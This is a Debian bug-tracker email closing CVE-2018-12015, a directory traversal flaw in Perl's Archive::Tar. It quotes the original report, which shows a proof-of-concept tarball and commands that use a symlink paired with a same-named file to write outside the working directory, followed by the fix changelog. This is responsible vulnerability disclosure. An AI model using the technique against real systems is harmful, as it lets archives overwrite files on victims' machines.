Bug#900834: marked as done (perl: CVE-2018-12015: Archive::Tar: directory traversal)

Tue, 26 Jun 2018 01:21:40 -0700 

Your message dated Tue, 26 Jun 2018 08:18:09 +0000
with message-id <e1fxjav-000hio...@fasolo.debian.org>
and subject line Bug#900834: fixed in perl 5.28.0-1
has caused the Debian Bug report #900834,
regarding perl: CVE-2018-12015: Archive::Tar: directory traversal
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
900834: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message --- 
Source: perl
Version: 5.26.2-5
Tags: security
By default, the Archive::Tar module doesn't allow extracting files outside the current working directory. However, you can bypass this secure extraction mode easily by putting a symlink and a regular file with the same name into the tarball.
I've attached proof of concept tarball, which makes Archive::Tar create /tmp/moo, regardless of what the current working directory is: 

  $ tar -tvvf traversal.tar.gz
  lrwxrwxrwx root/root         0 2018-06-05 18:55 moo -> /tmp/moo
  -rw-r--r-- root/root         4 2018-06-05 18:55 moo

  $ pwd
  /home/jwilk

  $ ls /tmp/moo
  ls: cannot access '/tmp/moo': No such file or directory

  $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'

  $ ls /tmp/moo
  /tmp/moo

--
Jakub Wilk

Attachment: traversal.tar.gz
Description: application/gzip


--- End Message ---
--- Begin Message --- 
Source: perl
Source-Version: 5.28.0-1

We believe that the bug you reported is fixed in the latest version of
perl, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 900...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Niko Tyni <nt...@debian.org> (supplier of updated perl package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Mon, 25 Jun 2018 22:20:16 +0300
Source: perl
Binary: perl-base perl-doc perl-debug libperl5.28 libperl-dev perl-modules-5.28 
perl
Architecture: source
Version: 5.28.0-1
Distribution: experimental
Urgency: medium
Maintainer: Niko Tyni <nt...@debian.org>
Changed-By: Niko Tyni <nt...@debian.org>
Description:
 libperl-dev - Perl library: development files
 libperl5.28 - shared Perl library
 perl       - Larry Wall's Practical Extraction and Report Language
 perl-base  - minimal Perl system
 perl-debug - debug-enabled Perl interpreter
 perl-doc   - Perl documentation
 perl-modules-5.28 - Core Perl modules
Closes: 900834
Changes:
 perl (5.28.0-1) experimental; urgency=medium
 .
   [ Dominic Hargreaves ]
   * Merge 5.26.2-6 from unstable
     - [SECURITY] CVE-2018-12015: fix directory traversal vulnerability
       in Archive-Tar (Closes: #900834)
 .
   [ Niko Tyni ]
   * Add an autopkgtest check that trivially embeds Perl in C.
   * Import new upstream major release.
Checksums-Sha1:
 4de68cb29e14d3fd4bb4df4a6bbc6c8c01671d6b 2810 perl_5.28.0-1.dsc
 21339f5f1bcacbaed5cdfe97368eacbc5e55da35 411944 
perl_5.28.0.orig-regen-configure.tar.xz
 c0e9e7a0dea97ec9816687d865fd461a99ef185c 12410536 perl_5.28.0.orig.tar.xz
 f69e2f6d929af8f8509857a8462373ababe05033 158260 perl_5.28.0-1.debian.tar.xz
 66ccc15f8cdb38e2b3ad50d2e94de64cf2a6a3ae 4729 perl_5.28.0-1_source.buildinfo
Checksums-Sha256:
 226d942fbe976325a81bdd7e870dd24788abdf8c13dd372624eb3522e16095be 2810 
perl_5.28.0-1.dsc
 5873b81af4514d3910ab1a8267b15ff8c0e2100dbae4edfd10b65ef72cd31ef8 411944 
perl_5.28.0.orig-regen-configure.tar.xz
 059b3cb69970d8c8c5964caced0335b4af34ac990c8e61f7e3f90cd1c2d11e49 12410536 
perl_5.28.0.orig.tar.xz
 a587795bbaaec31d0dbfa84b2d2f130bc47d8926823de8afb5141904df892a61 158260 
perl_5.28.0-1.debian.tar.xz
 c000ae91b48aeb9923ae38398ab8b2e6e8a9c4368d3b6c7bf4f77498ed3f1f29 4729 
perl_5.28.0-1_source.buildinfo
Files:
 7148eff8c8fbf5f8410b3ac475cd435e 2810 perl standard perl_5.28.0-1.dsc
 fbf2e774fdcc55c92afe713db38e5e25 411944 perl standard 
perl_5.28.0.orig-regen-configure.tar.xz
 f3245183c0a08f65e94a3333995af08e 12410536 perl standard perl_5.28.0.orig.tar.xz
 433f0df9d2640f50ee6a801c03f11d4c 158260 perl standard 
perl_5.28.0-1.debian.tar.xz
 d89e67cbcff53286c4ed087c4aefc229 4729 perl standard 
perl_5.28.0-1_source.buildinfo

-----BEGIN PGP SIGNATURE-----

iQJFBAEBCAAvFiEEdqKOQsmBHZHoj7peLsD/s7cwGx8FAlsx6q4RHG50eW5pQGRl
Ymlhbi5vcmcACgkQLsD/s7cwGx8QHRAAw2TmhU/MC8l+aMkt0xCzyTi1FV9xwzDV
3cfU3Zx7voqdosOjUCFRaHoAj4ZhjRKPuMCqZJQXcz1E5UAhGL0nGEx9h01WAs57
1Y+PT8pToUc+9gEvl4ySEvpOL2ow1r+qSOW74I9zqDO4W+zIORTPQB+ZrOzcoykk
v8n4LlqhxkCtcyBYt+O/GycE1Bcw5A22hteSc3Hhe0tJ/hN8qzunftpvLNcYP6qG
WtJACE20NtafR7W5YJOltZPLPtlCkVqWDjzpV74+iCBjwuTb2jY+0QCGoeqDOWAM
xOdjMHVumCSuE0AqjCyUrhJXmfhVaxZHy9TtEUongTJQQmdRK591QI3ryPslw3Fi
eC2NXEnrceZ7SAfnSQ2abF11og9ubBWpKwm5p6N22lJEiUR+x8xkV7bgk8LEvn3T
kBZpHj4vHSNCcwdyrHakhPz+dgmo5A9OMX6Ni4ZPjexlB5IvpcElo4E0+D/61ueT
pZODvpP8hzR+YnHjdotnvwp/gx8NqiMcejWqOula1coPdtveaaNj3v1FLNGE9joU
vLqCc5yc7jLbInUb1F0CrMcxGZP0czZTQvYtJ+qQWamhLE397asrkjKPvpmQ31D9
yUnUJiLozfkmVFZuyE+oBgJpHjdGWL8fDcgBFTO/iSexhZyf+LagGnk4hLMUxabu
WWVIVjTU9Pg=
=Qe4Q
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to